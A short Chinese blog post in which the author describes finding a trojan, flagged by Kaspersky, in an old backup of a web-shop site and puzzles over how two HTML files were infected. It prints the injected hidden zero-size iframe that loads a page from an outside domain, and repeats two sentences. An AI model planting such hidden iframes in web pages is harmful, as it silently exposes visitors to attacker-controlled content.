javascript学习
May
21
刚才整理一些资料,打开一个几年前做的网站的备份时,卡巴斯基猛地报警,怪吓人的:(。
信息如下:已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.cw 文件: I:\.....\top.htm。
这是一个几年前给人做的一个网店类网站。打开被感染文件,发现文件末尾加了这么一行:
信息如下:已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.cw 文件: I:\.....\top.htm。
这是一个几年前给人做的一个网店类网站。打开被感染文件,发现文件末尾加了这么一行:
<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
。顺藤摸瓜,查查rfhwfhw.com的注册信息,这回,我可懵了,这个域名是2007.7.3注册的,我的备份是2006年6月的。仔细想想,文件应该是在我的备份盘里被感染的,但同目录下存在的大量的htm文件,怎么只有两个感染了呢?这也是个迷啊!
